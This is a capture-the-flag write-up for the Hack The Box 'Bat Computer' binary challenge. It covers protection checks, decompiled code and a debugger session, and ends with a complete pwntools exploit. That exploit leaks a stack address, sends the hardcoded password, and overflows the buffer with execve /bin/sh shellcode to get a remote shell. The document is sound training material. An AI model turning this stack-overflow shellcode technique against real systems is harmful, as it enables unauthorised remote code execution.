Skip to content

Bat Computer

🏷 pwn

Intro to Binary Exploitation htb-pwn

Bat Computer.zip
🔑 hackthebox
$ file batcomputer
batcomputer: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=497abb33ba7b0370d501f173facc947759aa4e22, for GNU/Linux 3.2.0, stripped

$ checksec batcomputer
...
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      PIE enabled
    RWX:      Has RWX segments
  • Position Independent Executable (PIE) — a binary and all of its dependencies are loaded into random locations within virtual memory each time the application is executed
  • Partial RELRO — some sections of the binary are read-only, preventing them from being modified
  • Stack Canary — a value written on the stack which is later checked to ensure it has not been overwritten; used to detect buffer overflows
  • Non-Executable Stack (NX) — a memory protection mechanism used to prevent shell code located within the stack from being executed
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  int v4; // [rsp+0h] [rbp-60h]
  int v5; // [rsp+4h] [rbp-5Ch]
  int v6; // [rsp+14h] [rbp-4Ch]

  sub_11A9(a1, a2, a3);
  while ( 1 )
  {
    while ( 1 )
    {
      memset(&v5, 0, 0x10uLL);
      printf("Welcome to your BatComputer, Batman. What would you like to do?\n1. Track Joker\n2. Chase Joker\n> ");
      __isoc99_scanf("%d", &v4);
      if ( v4 != 1 )
        break;
      printf("It was very hard, but Alfred managed to locate him: %p\n", &v6);
    }
    if ( v4 != 2 )
      break;
    printf("Ok. Let's do this. Enter the password: ");
    __isoc99_scanf("%15s", &v5);
    if ( strcmp((const char *)&v5, "b4tp@$$w0rd!") )
    {
      puts("The password is wrong.\nI can't give you access to the BatMobile!");
      exit(0);
    }
    printf("Access Granted. \nEnter the navigation commands: ");
    read(0, &v6, 0x89uLL);
    puts("Roger that!");
  }
  puts("Too bad, now who's gonna save Gotham? Alfred?");
  return 0LL;
}

gef➤  run
Starting program: {...}
Welcome to your BatComputer, Batman. What would you like to do?
1. Track Joker
2. Chase Joker
> ^C
Program received signal SIGINT, Interrupt.
0x00007ffff7ec055e in __GI___libc_read (fd=0x0, buf=0x7ffff7fa0a23 <_IO_2_1_stdin_+131>, nbytes=0x1) at ../sysdeps/unix/sysv/linux/read.c:26
26  ../sysdeps/unix/sysv/linux/read.c: No such file or directory.

[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0xfffffffffffffe00
$rbx   : 0x007ffff7fa09a0  →  0x00000000fbad208b
$rcx   : 0x007ffff7ec055e  →  0x5a77fffff0003d48 ("H="?)
$rdx   : 0x1               
$rsp   : 0x007fffffffd458  →  0x007ffff7e52cdc  →  <_IO_file_underflow+396> test rax, rax
$rbp   : 0x007ffff7fa24a0  →  0x0000000000000000
$rsi   : 0x007ffff7fa0a23  →  0xfa36800000000000
$rdi   : 0x0               
$rip   : 0x007ffff7ec055e  →  0x5a77fffff0003d48 ("H="?)
$r8    : 0x0               
$r9    : 0xffffffffffffff88
$r10   : 0x00555555556069  →  0x4900000000006425 ("%d"?)
$r11   : 0x246             
$r12   : 0x007ffff7fa16c0  →  0x00000000fbad2887
$r13   : 0xd68             
$r14   : 0x007ffff7fa18a0  →  0x0000000000000000
$r15   : 0x007ffff7fa2608  →  0x007ffff7e54a70  →  <_IO_cleanup+0> push r15
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow resume virtualx86 identification]
$cs: 0x33 $ss: 0x2b $ds: 0x00 $es: 0x00 $fs: 0x00 $gs: 0x00 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x007fffffffd458│+0x0000: 0x007ffff7e52cdc  →  <_IO_file_underflow+396> test rax, rax    ← $rsp
0x007fffffffd460│+0x0008: 0x0000000000000000
0x007fffffffd468│+0x0010: 0x0000000000000000
0x007fffffffd470│+0x0018: 0x0000000000000003
0x007fffffffd478│+0x0020: 0x007ffff7fa09a0  →  0x00000000fbad208b
0x007fffffffd480│+0x0028: 0x007ffff7fa24a0  →  0x0000000000000000
0x007fffffffd488│+0x0030: 0x007ffff7fa14c0  →  0x007ffff7f9d740  →  0x007ffff7f6c209  →  0x636d656d5f5f0043 ("C"?)
0x007fffffffd490│+0x0038: 0x0000000000000000
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7ec0558 <read+8>         test   eax, eax
   0x7ffff7ec055a <read+10>        jne    0x7ffff7ec0570 <__GI___libc_read+32>
   0x7ffff7ec055c <read+12>        syscall 
 → 0x7ffff7ec055e <read+14>        cmp    rax, 0xfffffffffffff000
   0x7ffff7ec0564 <read+20>        ja     0x7ffff7ec05c0 <__GI___libc_read+112>
   0x7ffff7ec0566 <read+22>        ret    
   0x7ffff7ec0567 <read+23>        nop    WORD PTR [rax+rax*1+0x0]
   0x7ffff7ec0570 <read+32>        sub    rsp, 0x28
   0x7ffff7ec0574 <read+36>        mov    QWORD PTR [rsp+0x18], rdx
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "batcomputer", stopped 0x7ffff7ec055e in __GI___libc_read (), reason: SIGINT
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7ec055e → __GI___libc_read(fd=0x0, buf=0x7ffff7fa0a23 <_IO_2_1_stdin_+131>, nbytes=0x1)
[#1] 0x7ffff7e52cdc → _IO_new_file_underflow(fp=0x7ffff7fa09a0 <_IO_2_1_stdin_>)
[#2] 0x7ffff7e53f42 → __GI__IO_default_uflow(fp=0x7ffff7fa09a0 <_IO_2_1_stdin_>)
[#3] 0x7ffff7e2be20 → __vfscanf_internal(s=<optimized out>, format=<optimized out>, argptr=0x7fffffffdbd0, mode_flags=0x2)
[#4] 0x7ffff7e2ae6e → __isoc99_scanf(format=<optimized out>)
[#5] 0x555555555241 → mov eax, DWORD PTR [rbp-0x60]
[#6] 0x7ffff7df97fd → __libc_start_main(main=0x5555555551ec, argc=0x1, argv=0x7fffffffde08, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffddf8)
[#7] 0x5555555550de → hlt 
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

[#6] 0x7ffff7df97fd → __libc_start_main(main=0x5555555551ec, argc=0x1, argv=0x7fffffffde08, init=<optimized out>,

gef> break *0x5555555551ec
gef> r

Solution

#!/home/carloz/PycharmProjects/python2/venv/bin/python2

from pwn import *

url = "159.65.92.13"
port = 30830

target = remote(url, port)

# target = process("./batcomputer")

print target.recv()

pilih = b'1'

target.sendline(pilih)

print target.recvuntil('It was very hard, but Alfred managed to locate him: ')

addr_vuln = target.recvuntil('\n')

print addr_vuln

print target.recv()

pilih = b'2'

target.sendline(pilih)

print target.recv()

pswd = b'b4tp@$$w0rd!'

target.sendline(pswd)

print target.recv()

# shellcode = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'   # http://shell-storm.org/shellcode/files/shellcode-806.php
shellcode = b'\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05' # http://shell-storm.org/shellcode/files/shellcode-603.php
payload = ''
payload += shellcode + 'a'*(84-len(shellcode))
payload += p64(int(addr_vuln,16))

target.sendline(payload)

print target.recv()

pilih = b'3'

target.sendline(pilih)

target.interactive()